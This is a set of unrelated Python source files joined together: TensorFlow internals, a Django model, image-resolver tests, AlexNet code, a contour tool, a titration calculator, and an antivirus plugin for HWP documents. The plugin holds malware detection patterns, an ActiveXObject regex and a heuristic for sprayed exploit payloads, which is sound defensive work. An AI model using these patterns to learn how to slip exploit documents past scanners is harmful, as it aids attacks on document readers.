return cls.GLOBAL_VARIABLES
@tf_export("add_to_collection")
def add_to_collection(name, value):
"""Wrapper for `Graph.add_to_collection()` using the default graph.
See @{tf.Graph.add_to_collection}
for more details.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collection.
@compatibility(eager)
Collections are only supported in eager when variables are created inside an
EagerVariableStore (e.g. as part of a layer or template).
@end_compatibility
"""
get_default_graph().add_to_collection(name, value)
@tf_export("add_to_collections")
def add_to_collections(names, value):
"""Wrapper for `Graph.add_to_collections()` using the default graph.
See @{tf.Graph.add_to_collections}
for more details.
Args:
    names: The keys for the collections. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collections.
@compatibility(eager)
Collections are only supported in eager when variables are created inside an
EagerVariableStore (e.g. as part of a layer or template).
@end_compatibility
"""
get_default_graph().add_to_collections(names, value)
@tf_export("get_collection_ref")
def get_collection_ref(key):
"""Wrapper for `Graph.get_collection_ref()` using the default graph.
See @{tf.Graph.get_collection_ref}
for more details.
Args:
key: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
Returns:
The list of values in the collection with the given `name`, or an empty
list if no value has been added to that collection. Note that this returns
the collection list itself, which can be modified in place to change the
collection.
@compatibility(eager)
Collections are not supported when eager execution is enabled.
@end_compatibility
"""
return get_default_graph().get_collection_ref(key)
@tf_export("get_collection")
def get_collection(key, scope=None):
"""Wrapper for `Graph.get_collection()` using the default graph.
See @{tf.Graph.get_collection}
for more details.
Args:
key: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
scope: (Optional.) If supplied, the resulting list is filtered to include
only items whose `name` attribute matches using `re.match`. Items
without a `name` attribute are never returned if a scope is supplied and
      the choice of `re.match` means that a `scope` without special tokens
filters by prefix.
Returns:
The list of values in the collection with the given `name`, or
an empty list if no value has been added to that collection. The
list contains the values in the order under which they were
collected.
@compatibility(eager)
Collections are not supported when eager execution is enabled.
@end_compatibility
"""
return get_default_graph().get_collection(key, scope)
def get_all_collection_keys():
"""Returns a list of collections used in the default graph."""
return get_default_graph().get_all_collection_keys()
name_scope_cache = {}
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export("name_scope", "keras.backend.name_scope")
class name_scope(object): # pylint: disable=invalid-name
"""A context manager for use when defining a Python op.
This context manager validates that the given `values` are from the
same graph, makes that graph the default graph, and pushes a
name scope in that graph (see
@{tf.Graph.name_scope}
for more details on that).
For example, to define a new Python op called `my_op`:
```python
def my_op(a, b, c, name=None):
with tf.name_scope(name, "MyOp", [a, b, c]) as scope:
a = tf.convert_to_tensor(a, name="a")
b = tf.convert_to_tensor(b, name="b")
c = tf.convert_to_tensor(c, name="c")
# Define some computation that uses `a`, `b`, and `c`.
return foo_op(..., name=scope)
```
"""
@property
def name(self):
return self._name
def __init__(self, name, default_name=None, values=None):
"""Initialize the context manager.
Args:
name: The name argument that is passed to the op function.
default_name: The default name to use if the `name` argument is `None`.
values: The list of `Tensor` arguments that are passed to the op function.
"""
self._name = default_name if name is None else name
self._default_name = default_name
self._values = values
self._ctx = context.context()
self._in_eager_mode = self._ctx.executing_eagerly()
def __enter__(self):
"""Start the scope block.
Returns:
The scope name.
Raises:
ValueError: if neither `name` nor `default_name` is provided
but `values` are.
"""
if self._in_eager_mode:
self._old_name = self._ctx.scope_name
if not self._name:
scope_name = ""
else:
cache_key = self._name, self._old_name, self._default_name
if cache_key in name_scope_cache:
self._ctx.scope_name = name_scope_cache[cache_key]
return self._ctx.scope_name
elif self._name[-1] == "/":
# A trailing slash breaks out of nested name scopes, indicating a
# fully specified scope name, for compatibility with Graph.name_scope.
scope_name = self._name
else:
name_with_trailing_slash = self._name + "/"
scope_name = (
self._old_name + name_with_trailing_slash
if self._old_name else name_with_trailing_slash)
name_scope_cache[cache_key] = scope_name
self._ctx.scope_name = scope_name
return scope_name
else:
if self._name is None and self._values is not None:
        # We only raise an error if values is not None (i.e. provided) because
        # currently tf.name_scope(None) (with values=None) is sometimes used as
        # an idiom to reset to the top scope.
raise ValueError(
"At least one of name (%s) and default_name (%s) must be provided."
% (self._name, self._default_name))
if self._values is None:
self._values = []
g = _get_graph_from_inputs(self._values)
self._g_manager = g.as_default()
self._g_manager.__enter__()
try:
self._name_scope = g.name_scope(self._name)
return self._name_scope.__enter__()
except:
self._g_manager.__exit__(*sys.exc_info())
raise
def __exit__(self, type_arg, value_arg, traceback_arg):
if self._in_eager_mode:
self._ctx.scope_name = self._old_name
else:
self._name_scope.__exit__(type_arg, value_arg, traceback_arg)
self._g_manager.__exit__(type_arg, value_arg, traceback_arg)
return False # False values do not suppress exceptions
def strip_name_scope(name, export_scope):
"""Removes name scope from a name.
Args:
name: A `string` name.
export_scope: Optional `string`. Name scope to remove.
Returns:
Name with name scope removed, or the original name if export_scope
is None.
"""
if export_scope:
if export_scope[-1] == "/":
export_scope = export_scope[:-1]
try:
# Strips export_scope/, export_scope///,
# ^export_scope/, loc:@export_scope/.
str_to_replace = r"([\^]|loc:@|^)" + export_scope + r"[\/]+(.*)"
return re.sub(str_to_replace, r"\1\2", compat.as_str(name), count=1)
except TypeError as e:
# If the name is not of a type we can process, simply return it.
logging.warning(e)
return name
else:
return name
def prepend_name_scope(name, import_scope):
"""Prepends name scope to a name.
Args:
name: A `string` name.
import_scope: Optional `string`. Name scope to add.
Returns:
Name with name scope added, or the original name if import_scope
is None.
"""
if import_scope:
if import_scope[-1] == "/":
import_scope = import_scope[:-1]
try:
str_to_replace = r"([\^]|loc:@|^)(.*)"
return re.sub(str_to_replace, r"\1" + import_scope + r"/\2",
compat.as_str(name))
except TypeError as e:
# If the name is not of a type we can process, simply return it.
logging.warning(e)
return name
else:
return name
# pylint: disable=g-doc-return-or-yield
# pylint: disable=not-context-manager
@tf_export("op_scope")
@tf_contextlib.contextmanager
def op_scope(values, name, default_name=None):
"""DEPRECATED. Same as name_scope above, just different argument order."""
logging.warn("tf.op_scope(values, name, default_name) is deprecated,"
" use tf.name_scope(name, default_name, values)")
with name_scope(name, default_name=default_name, values=values) as scope:
yield scope
_proto_function_registry = registry.Registry("proto functions")
def register_proto_function(collection_name,
proto_type=None,
to_proto=None,
from_proto=None):
"""Registers `to_proto` and `from_proto` functions for collection_name.
`to_proto` function converts a Python object to the corresponding protocol
buffer, and returns the protocol buffer.
  `from_proto` function converts a protocol buffer into a Python object, and
  returns the object.
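  For example (a minimal sketch; `my_pb2.MyThingDef`, `_my_thing_to_proto` and
  `_my_thing_from_proto` are hypothetical):
    register_proto_function("my_things",
                            proto_type=my_pb2.MyThingDef,
                            to_proto=_my_thing_to_proto,
                            from_proto=_my_thing_from_proto)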
Args:
collection_name: Name of the collection.
proto_type: Protobuf type, such as `saver_pb2.SaverDef`,
      `variable_pb2.VariableDef`, `queue_runner_pb2.QueueRunnerDef`.
to_proto: Function that implements Python object to protobuf conversion.
from_proto: Function that implements protobuf to Python object conversion.
"""
if to_proto and not callable(to_proto):
raise TypeError("to_proto must be callable.")
if from_proto and not callable(from_proto):
raise TypeError("from_proto must be callable.")
_proto_function_registry.register((proto_type, to_proto, from_proto),
collection_name)
def get_collection_proto_type(collection_name):
"""Returns the proto_type for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[0]
except LookupError:
return None
def get_to_proto_function(collection_name):
"""Returns the to_proto function for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[1]
except LookupError:
return None
def get_from_proto_function(collection_name):
"""Returns the from_proto function for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[2]
except LookupError:
return None
def _operation_conversion_error(op, dtype=None, name=None, as_ref=False):
"""Produce a nice error if someone converts an Operation to a Tensor."""
raise TypeError(("Can't convert Operation '%s' to Tensor "
"(target dtype=%r, name=%r, as_ref=%r)") % (op.name, dtype,
name, as_ref))
register_tensor_conversion_function(Operation, _operation_conversion_error)
|
# ==============================================================================
# A NewArea is one specific Area + AreaName + AreaTerritory that starts
# due to exactly one HiventOperation.
#
# ------------------------------------------------------------------------------
# NewArea n:1 HiventOperation
# NewArea 1:1 Area
# NewArea 1:1 AreaName
# NewArea 1:1 AreaTerritory
# ==============================================================================
from django.db import models
from django.forms.models import model_to_dict
# ==============================================================================
class NewArea(models.Model):
# superordinate: HiventOperation
hivent_operation = models.ForeignKey ('HiventOperation', related_name='new_hivent_operation', default=0)
# own attributes
area = models.ForeignKey ('Area', related_name='new_area', default=0)
name = models.ForeignKey ('AreaName', related_name='new_area_name', default=0)
territory = models.ForeignKey ('AreaTerritory', related_name='new_area_territory', default=0)
# ----------------------------------------------------------------------------
def __unicode__(self):
return self.name.short_name
# ----------------------------------------------------------------------------
class Meta:
app_label = 'HistoGlobe_server'
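# Example usage (a minimal sketch; assumes related HiventOperation, Area,
# AreaName and AreaTerritory instances already exist):
#   new_area = NewArea.objects.create(
#       hivent_operation=operation,
#       area=area,
#       name=area_name,
#       territory=area_territory)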
|
import sys
import unittest
import requests
from os.path import dirname,abspath
sys.path.append( dirname( dirname( dirname( abspath(__file__)) ) ) )
from imageresolver import ImageResolver, FileExtensionResolver, PluginResolver, WebpageResolver
class TestImageResolver(unittest.TestCase):
def setUp(self):
# set to an imgur page
self.imgur_page = 'http://imgur.com/adtBv9Y'
# set to the expected result of the imgur page
# also checks the file extension
self.imgur_result = 'http://i.imgur.com/adtBv9Y.jpg'
# set to a web url
self.web_url = 'http://xkcd.com/353/'
# set to the expected return image from the web url
self.web_img = 'http://imgs.xkcd.com/comics/python.png'
def test_fetch_image_info(self):
i = ImageResolver()
(ext,width,height) = i.fetch_image_info(self.web_img)
self.assertEquals(ext,'.png')
self.assertEquals(width,518)
self.assertEquals(height,588)
def test_resolve_plugin(self):
i = ImageResolver()
i.register(PluginResolver())
src = i.resolve(self.imgur_page)
self.assertEquals(src,self.imgur_result)
def test_resolve_fileext(self):
i = ImageResolver()
i.register(FileExtensionResolver())
src = i.resolve(self.web_img)
self.assertEquals(src,self.web_img)
def test_resolve_webpage(self):
i = ImageResolver()
i.register(WebpageResolver(load_images=True))
src = i.resolve(self.web_url)
self.assertEquals(src, self.web_img )
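# Standard entry point so the tests can be run directly with a plain
# `python <this file>` invocation (any unittest runner also works).
if __name__ == '__main__':
    unittest.main()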
|
# -*- coding:utf-8 -*-
# Author: Kei Choi([email protected])
import os
import re
import zlib
import kernel
import kavutil
import ole
# -------------------------------------------------------------------------
# get_hwp_recoard(val)
# Decodes the given 4-byte value according to the HWP record structure.
# Input  : val - DWORD
# Return : tag_id, level, size
# -------------------------------------------------------------------------
def get_hwp_recoard(val):
b = 0b1111111111
c = 0b111111111111
tag_id = (val & b)
level = ((val >> 10) & b)
size = (val >> 20) & c
return tag_id, level, size
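# Example (a minimal sketch): for val = 0x00400042 the low 10 bits give
# tag_id = 0x42, the next 10 bits give level = 0, and the top 12 bits give
# size = 4.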
# -------------------------------------------------------------------------
# scan_hwp_recoard(buf, lenbuf)
# Walks the given buffer as a sequence of HWP records.
# Input  : buf - buffer
#          lenbuf - buffer size
# Return : True or False (whether record traversal succeeded) and the problematic tagid
# -------------------------------------------------------------------------
def scan_hwp_recoard(buf, lenbuf):
pos = 0
tagid = 0
while pos < lenbuf:
extra_size = 4
val = kavutil.get_uint32(buf, pos)
tagid, level, size = get_hwp_recoard(val)
if size == 0xfff:
extra_size = 8
size = kavutil.get_uint32(buf, pos + 4)
if tagid == 0x43 and size > 4000: # PARA_TEXT
t_buf = buf[pos:pos+size+extra_size]
d_buf = zlib.compress(t_buf)
if len(d_buf) / float(len(t_buf)) < 0.02:
return False, 0x43
pos += (size + extra_size)
if pos == lenbuf:
return True, -1
return False, tagid
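# Note (an informal reading of the heuristic above): a PARA_TEXT record
# (tag 0x43) larger than 4000 bytes that zlib-compresses to less than 2% of
# its original size is almost certainly a long run of near-identical bytes,
# which is typical of sprayed exploit payloads rather than real document text.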
# -------------------------------------------------------------------------
# KavMain class
# -------------------------------------------------------------------------
class KavMain:
# ---------------------------------------------------------------------
# init(self, plugins_path)
    # Initializes the plugin engine.
    # Input  : plugins_path - location of the plugin engine
    #          verbose - debug mode (True or False)
    # Return : 0 - success, non-zero - failure
# ---------------------------------------------------------------------
    def init(self, plugins_path, verbose=False):  # initialize the plugin engine
self.handle = {}
self.hwp_ole = re.compile('bindata/bin\d+\.ole$', re.IGNORECASE)
s = r'n\x00e\x00w\x00(\x20\x00)+A\x00c\x00t\x00i\x00v\x00e\x00X\x00O\x00b\x00j\x00e\x00c\x00t\x00'
self.hwp_js = re.compile(s, re.IGNORECASE)
        return 0  # plugin engine initialized successfully
# ---------------------------------------------------------------------
# uninit(self)
    # Shuts down the plugin engine.
    # Return : 0 - success, non-zero - failure
# ---------------------------------------------------------------------
    def uninit(self):  # shut down the plugin engine
        return 0  # plugin engine shut down successfully
# ---------------------------------------------------------------------
# getinfo(self)
    # Reports the main information about the plugin engine (author, version, ...).
    # Return : plugin engine information
# ---------------------------------------------------------------------
    def getinfo(self):  # main information about the plugin engine
        info = dict()  # declare a dictionary
        info['author'] = 'Kei Choi'  # author
        info['version'] = '1.1'  # version
        info['title'] = 'HWP Engine'  # engine description
        info['kmd_name'] = 'hwp'  # engine file name
        info['make_arc_type'] = kernel.MASTER_DELETE  # malware is disinfected by deleting the file
        info['sig_num'] = len(self.listvirus())  # number of malware signatures that can be detected/disinfected
return info
# ---------------------------------------------------------------------
# listvirus(self)
    # Reports the list of malware that can be detected/disinfected.
    # Return : list of malware names
# ---------------------------------------------------------------------
    def listvirus(self):  # list of detectable malware
        vlist = list()  # declare a list
        vlist.append('Exploit.HWP.Generic')  # register the name of malware that is detected/disinfected
        vlist.append('Exploit.JS.Agent.gen')  # register the name of malware that is detected/disinfected
vlist.sort()
return vlist
# ---------------------------------------------------------------------
# scan(self, filehandle, filename, fileformat)
    # Scans for malware.
    # Input  : filehandle - file handle
    #          filename - file name
    #          fileformat - file format
    #          filename_ex - file name (name of the file inside an archive)
    # Return : (whether malware was found, malware name, malware ID), etc.
# ---------------------------------------------------------------------
    def scan(self, filehandle, filename, fileformat, filename_ex):  # scan for malware
mm = filehandle
if filename_ex.lower().find('bodytext/section') >= 0 or filename_ex.lower().find('docinfo') >= 0:
val = kavutil.get_uint32(mm, 0)
tagid, level, size = get_hwp_recoard(val)
            # Only traverse records when the first tag is the document header (0x42) or document properties (0x10).
if tagid == 0x42 or tagid == 0x10:
ret, tagid = scan_hwp_recoard(mm, len(mm))
                if ret is False:  # record traversal failed
return True, 'Exploit.HWP.Generic.%02X' % tagid, 0, kernel.INFECTED
elif filename_ex.lower().find('scripts/defaultjscript') >= 0:
if self.hwp_js.search(mm):
return True, 'Exploit.JS.Agent.gen', 0, kernel.INFECTED
        # Return that no malware was found.
return False, '', -1, kernel.NOT_FOUND
    # ---------------------------------------------------------------------
    # disinfect(self, filename, malware_id)
    # Disinfects the malware.
    # Input  : filename   - file name
    #        : malware_id - ID of the malware to disinfect
    # Return : whether the malware was disinfected
    # ---------------------------------------------------------------------
    def disinfect(self, filename, malware_id):  # disinfect malware
        try:
            # Is the ID received from the scan result 0?
            if malware_id == 0:
                os.remove(filename)  # delete the file
                return True  # disinfection complete
        except IOError:
            pass
        return False  # disinfection failed
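# A minimal sketch of the record-header decode that get_hwp_recoard is assumed
# to perform (this helper is illustrative and not part of the plugin): an HWP
# 5.0 record header packs TagID (10 bits), Level (10 bits) and Size (12 bits)
# into one little-endian DWORD, and Size == 0xFFF means the real size follows
# in the next DWORD, which is why scan_hwp_recoard widens extra_size to 8.
def _decode_hwp_record_header(val):
    tagid = val & 0x3FF           # bits 0-9
    level = (val >> 10) & 0x3FF   # bits 10-19
    size = (val >> 20) & 0xFFF    # bits 20-31
    return tagid, level, size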
|
'''
date: 2017-09-20
author: scutjason
'''
'''
AlexNet for mnist model
5 Convolutional Layer
3 Full-connect Layer
'''
import tensorflow as tf
'''
# get the dataSets
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("dataSets", one_hot = True)
# first, define the super_param
learning_rate = 0.001
training_iters = 200000
batch_size = 64
display_step = 20
# define the network param
n_input = 784
n_classes = 10
dropout = 0.8
# define x, y
x = tf.placeholder(tf.float32, [None, n_input])
y = tf.placeholder(tf.float32, [None, n_classes])
keep_prob = tf.placeholder(tf.float32)
# define the conv layer
def conv2d(name, l_input, w, b):
return tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(l_input, w, strides=[1,1,1,1], padding='SAME'), b), name=name)
# pool layer
def max_pool(name, l_input, k):
return tf.nn.max_pool(l_input, ksize=[1,k,k,1], strides=[1,k,k,1], padding='SAME', name=name)
# local response normalization
def norm(name, l_input, lsize=4):
return tf.nn.lrn(l_input, lsize, bias=1.0, alpha=0.001/9.0, beta=0.75, name=name)
def alex_net(_X, _weights, _biases, _dropout):
    # reshape to a 4-D image tensor; -1 lets TensorFlow infer the batch dimension
_X = tf.reshape(_X, shape=[-1, 28, 28, 1])
# conv1
conv1 = conv2d("conv1", _X, _weights["wc1"], _biases["bc1"])
# pool1
pool1 = max_pool("pool1", conv1, k=2)
# norm1
norm1 = norm("norm1", pool1, lsize=4)
# dropout
norm1 = tf.nn.dropout(norm1, _dropout)
# conv2
conv2 = conv2d("conv2", norm1, _weights["wc2"], _biases["bc2"])
pool2 = max_pool("pool2", conv2, k=2)
norm2 = norm("norm2", pool2, lsize=4)
norm2 = tf.nn.dropout(norm2, _dropout)
# conv3
conv3 = conv2d("conv3", norm2, _weights["wc3"], _biases["bc3"])
pool3 = max_pool("pool3", conv3, k=2)
norm3 = norm("norm3", pool3, lsize=4)
norm3 = tf.nn.dropout(norm3, _dropout)
# fc1
dense1 = tf.reshape(norm3, [-1, _weights["wd1"].get_shape().as_list()[0]])
print(dense1.get_shape())
dense1 = tf.nn.relu(tf.matmul(dense1, _weights["wd1"]) + _biases["bd1"], name="fc1")
# fc2
dense2 = tf.nn.relu(tf.matmul(dense1, _weights["wd2"]) + _biases["bd2"], name="fc2")
out = tf.matmul(dense2, _weights["out"]) + _biases["out"]
return out
weights = {
"wc1": tf.Variable(tf.random_normal([3,3,1,64])),
"wc2": tf.Variable(tf.random_normal([3,3,64,128])),
"wc3": tf.Variable(tf.random_normal([3,3,128,256])),
"wd1": tf.Variable(tf.random_normal([4*4*256, 1024])),
"wd2": tf.Variable(tf.random_normal([1024,1024])),
"out": tf.Variable(tf.random_normal([1024, 10]))
}
biases = {
"bc1": tf.Variable(tf.random_normal([64])),
"bc2": tf.Variable(tf.random_normal([128])),
"bc3": tf.Variable(tf.random_normal([256])),
"bd1": tf.Variable(tf.random_normal([1024])),
"bd2": tf.Variable(tf.random_normal([1024])),
"out": tf.Variable(tf.random_normal([n_classes]))
}
# build the model, pred is the output class
pred = alex_net(x, weights, biases, keep_prob)
# loss
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = pred, labels = y))
# learn let cost least
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# test
correct_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# init variable
init = tf.global_variables_initializer()
# sess
with tf.Session() as sess:
sess.run(init)
step = 1
while step*batch_size < training_iters:
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
sess.run(optimizer, feed_dict={x: batch_xs, y:batch_ys, keep_prob:dropout})
if step % display_step == 0:
acc = sess.run(accuracy, feed_dict={x: batch_xs, y:batch_ys, keep_prob:1.})
loss = sess.run(cost, feed_dict={x: batch_xs, y: batch_ys, keep_prob:1.0})
print("Iter" +str(step*batch_size) + ", Minibatch Loss = " + "{:.6f}".format(loss) + ", Training Accuracy = " + "{:.5f}".format(acc))
step +=1
print("Optimization Finished!")
print("Testing Accuracy:", sess.run(accuracy, feed_dict={x: mnist.test.images[:256], y: mnist.test.labels[:256], keep_prob: 1.0}))
'''
# alexNet model
from datetime import datetime
import math
import time
batch_size = 32
num_batches = 100
# keep_prob is used by the dropout in the fully connected layers of inference();
# define it here because its original definition only exists inside the
# commented-out mnist script above.
keep_prob = tf.placeholder(tf.float32)
# print every layer
def print_activations(t):
    print(t.op.name, t.get_shape().as_list())
# model
def inference(images):
parameters = []
# conv1
with tf.name_scope("conv1") as scope:
        kernel = tf.Variable(tf.truncated_normal([11,11,3,96], dtype=tf.float32, stddev=1e-1), name='weight')
        # output feature map: 56*56*96 (11x11 kernel, stride 4, SAME padding)
conv = tf.nn.conv2d(images, kernel, [1,4,4,1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32), trainable=True, name='biases')
bias = tf.nn.bias_add(conv, biases)
# relu
conv1 = tf.nn.relu(bias, name=scope)
print_activations(conv1)
parameters += [kernel, biases]
# lrn1
# depth_radius = 4
lrn1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001/9, beta=0.75, name="lrn1")
# pool1
# feature_map: 27*27*96
pool1 = tf.nn.max_pool(lrn1, ksize=[1,3,3,1], strides=[1,2,2,1], padding='VALID', name="pool1")
print_activations(pool1)
# conv2
with tf.name_scope("conv2") as scope:
        kernel = tf.Variable(tf.truncated_normal([5,5,96,256], dtype=tf.float32, stddev=1e-1), name="weight")
# output: 27*27*256
conv = tf.nn.conv2d(pool1, kernel, [1,1,1,1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name = 'biases')
bias = tf.nn.bias_add(conv, biases)
# relu
conv2 = tf.nn.relu(bias, name=scope)
print_activations(conv2)
parameters += [kernel, biases]
# lrn2
lrn2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001/9, beta=0.75, name="lrn2")
# pool2
# feature_map: 13*13*256
pool2 = tf.nn.max_pool(lrn2, ksize=[1,3,3,1], strides=[1,2,2,1], padding="VALID", name="pool2")
print_activations(pool2)
# conv3
with tf.name_scope("conv3") as scope:
kernel = tf.Variable(tf.truncated_normal([3,3,256,384], dtype=tf.float32, stddev=1e-1), name="weight")
# output: 13*13*384
conv = tf.nn.conv2d(pool2, kernel, [1,1,1,1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name = 'biases')
bias = tf.nn.bias_add(conv, biases)
# relu
conv3 = tf.nn.relu(bias, name=scope)
print_activations(conv3)
parameters += [kernel, biases]
# conv4
with tf.name_scope("conv4") as scope:
kernel = tf.Variable(tf.truncated_normal([3,3,384,384], dtype=tf.float32, stddev=1e-1), name="weight")
# output: 13*13*384
conv = tf.nn.conv2d(conv3, kernel, [1,1,1,1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
# relu
conv4 = tf.nn.relu(bias, name = scope)
print_activations(conv4)
parameters += [kernel, biases]
# conv5
with tf.name_scope("conv5") as scope:
kernel = tf.Variable(tf.truncated_normal([3,3,384,256], dtype=tf.float32, stddev=1e-1), name="weight")
# output: 13*13*256
conv = tf.nn.conv2d(conv4, kernel, [1,1,1,1], padding="SAME")
        biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name="biases")
        bias = tf.nn.bias_add(conv, biases)
# relu
conv5 = tf.nn.relu(bias, name=scope)
print_activations(conv5)
parameters += [kernel, biases]
# pool5
# feature_map: 6*6*256
pool5 = tf.nn.max_pool(conv5, ksize=[1,3,3,1], strides=[1,2,2,1], padding="VALID", name="pool5")
print_activations(pool5)
# fc1
dense1 = tf.reshape(pool5, [-1, 6*6*256])
    wd1 = tf.Variable(tf.truncated_normal([6*6*256, 4096], dtype=tf.float32, stddev=1e-1), name="wd1")
    bd1 = tf.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32), trainable=True, name="bd1")
dense1 = tf.nn.relu(tf.matmul(dense1, wd1) + bd1, name = "fc1")
dense1 = tf.nn.dropout(dense1, keep_prob)
# fc2
    wd2 = tf.Variable(tf.truncated_normal([4096, 4096], dtype=tf.float32, stddev=1e-1), name="wd2")
    bd2 = tf.Variable(tf.constant(0.0, shape=[4096], dtype=tf.float32), trainable=True, name="bd2")
    dense2 = tf.nn.relu(tf.matmul(dense1, wd2) + bd2, name="fc2")
dense2 = tf.nn.dropout(dense2, keep_prob)
# fc3
    wd3 = tf.Variable(tf.truncated_normal([4096, 1024], dtype=tf.float32, stddev=1e-1), name="wd3")
    bd3 = tf.Variable(tf.constant(0.0, shape=[1024], dtype=tf.float32), trainable=True, name="bd3")
out = tf.matmul(dense2, wd3) + bd3
return out
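# A minimal sketch (not part of the original source) of how `inference` could be
# exercised with the batch_size / num_batches defined above: build the graph on
# random 224x224x3 images, then time num_batches forward passes. The image size,
# the helper name and the timing loop are assumptions for illustration only.
def run_forward_benchmark():
    image_size = 224  # assumed AlexNet input resolution
    images = tf.Variable(tf.random_normal([batch_size, image_size, image_size, 3],
                                          dtype=tf.float32, stddev=1e-1))
    logits = inference(images)
    init = tf.global_variables_initializer()
    with tf.Session() as sess:
        sess.run(init)
        total_time = 0.0
        for _ in range(num_batches):
            start = time.time()
            sess.run(logits, feed_dict={keep_prob: 1.0})  # no dropout at inference time
            total_time += time.time() - start
        print("%s: forward pass, %.3f sec/batch over %d batches" %
              (datetime.now(), total_time / num_batches, num_batches))
# run_forward_benchmark()  # uncomment to time the forward pass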
|
# Copyright 2007 Zachary Pincus
# This file is part of CellTool.
#
# CellTool is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
"""Geometrically modify a set of contours.
This tool can be used to alter contours by rotating or rescaling them, or by
changing the ordering of their points.
If the contours have landmark points, these points can be re-weighted by this
tool. (See the documentation for add_landmarks for more details.)
"""
import celltool.utility.optparse as optparse
import celltool.simple_interface as simple_interface
import celltool.utility.path as path
import cli_tools
usage = "usage: %prog [options] contour_1 ... contour_n"
parser = optparse.OptionParser(usage=usage, description=__doc__.strip(),
formatter=cli_tools.CelltoolFormatter())
parser.set_defaults(
show_progress=True,
destination='.'
)
parser.add_option('-q', '--quiet', action='store_false', dest='show_progress',
help='suppress progress bars and other status updates')
parser.add_option('-r', '--rotate', type='float', metavar='ANGLE',
help='rotate each contour counter-clockwise by ANGLE (in degrees)')
parser.add_option('-s', '--scale', action='store', type='float', metavar='FACTOR',
help='rescale the contours by multiplicative FACTOR')
parser.add_option('-u', '--units', action='store',
help='name of the (new) units for the contours')
parser.add_option('-f', '--first-point', type='int', metavar='POINT',
  help='make point number POINT the new first point of each contour')
parser.add_option('-w', '--weight', action='append', dest='weights',
type='float', metavar='WEIGHT',
  help='set the weight shared by all contours to WEIGHT (if specified once), or set the weight of the nth landmark to WEIGHT (if specified multiple times)')
parser.add_option('-d', '--destination', metavar='DIRECTORY',
help='directory in which to write the output contours [default: %default]')
def main(name, arguments):
parser.prog = name
options, args = parser.parse_args(arguments)
args = cli_tools.glob_args(args)
if len(args) == 0:
raise ValueError('Some contour files must be specified!')
filenames = [path.path(arg) for arg in args]
contours = simple_interface.load_contours(filenames, show_progress = options.show_progress)
if options.first_point is not None:
options.first_point -= 1
if options.scale is not None or options.rotate is not None or options.units is not None or options.first_point is not None:
in_radians = False
if options.units is not None and options.units.lower() in ('um', 'micron', 'microns'):
options.units = u'\N{MICRO SIGN}m'
contours = simple_interface.transform_contours(contours, options.scale, options.rotate, in_radians,
options.units, options.first_point, options.show_progress, title = 'Modifying Contours')
if options.weights is not None:
contours = simple_interface.reweight_landmarks(contours, options.weights, options.show_progress)
destination = path.path(options.destination)
if not destination.exists():
destination.makedirs()
# note that with path objects, the '/' operator means 'join path components.'
names = [destination / filename.name for filename in filenames]
simple_interface.save_contours(contours, names, options.show_progress)
if __name__ == '__main__':
import sys
import os
main(os.path.basename(sys.argv[0]), sys.argv[1:])
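# Example invocation (hypothetical script and contour file names; the options
# are the ones registered on the parser above):
#   python modify_contours.py -r 90 -s 1.5 -u microns -d modified/ cell_01.contour cell_02.contour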
|
# Titration calculator. By Anjan Momi.
# {Calculates the pH at various stages of the titration of a strong acid against a strong base.}
# Copyright (C) {2014} {Anjandev Momi}
# Contact me at [email protected]
# Use http://www.codeskulptor.org/ to run this program.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import math
vol_OH = float(input("Enter the Volume of OH-"))
# Change this to your needs
vol_H3O = 25.0
concentration_OH = 0.1
concentration_H3O = 0.1
concentration_OH = concentration_OH * vol_OH / (vol_H3O + vol_OH)
concentration_H = concentration_H3O * vol_H3O / (vol_H3O + vol_OH)
# This could happen behind the scenes but I feel more
# certain about the numbers this program outputs if
# I can see the input.
print "concentration of OH- is", concentration_OH
print "concentration of H3O+ is",concentration_H
if concentration_OH == concentration_H:
print "Neutral. pH = 7"
elif concentration_OH > concentration_H:
excess_OH = concentration_OH - concentration_H
print math.log(excess_OH, 10) + 14
else:
excess_H3O = concentration_H - concentration_OH
print - math.log(excess_H3O, 10)
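# Worked example (input values assumed for illustration): adding 20.0 mL of
# 0.1 M OH- to 25.0 mL of 0.1 M H3O+ gives [OH-] = 0.1*20/45 ~= 0.0444 M and
# [H3O+] = 0.1*25/45 ~= 0.0556 M, so ~0.0111 M H3O+ remains in excess and the
# program prints pH = -log10(0.0111) ~= 1.95.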
|
# Copyright (C) 2010 Collabora Ltd. <http://www.collabora.co.uk/>
#
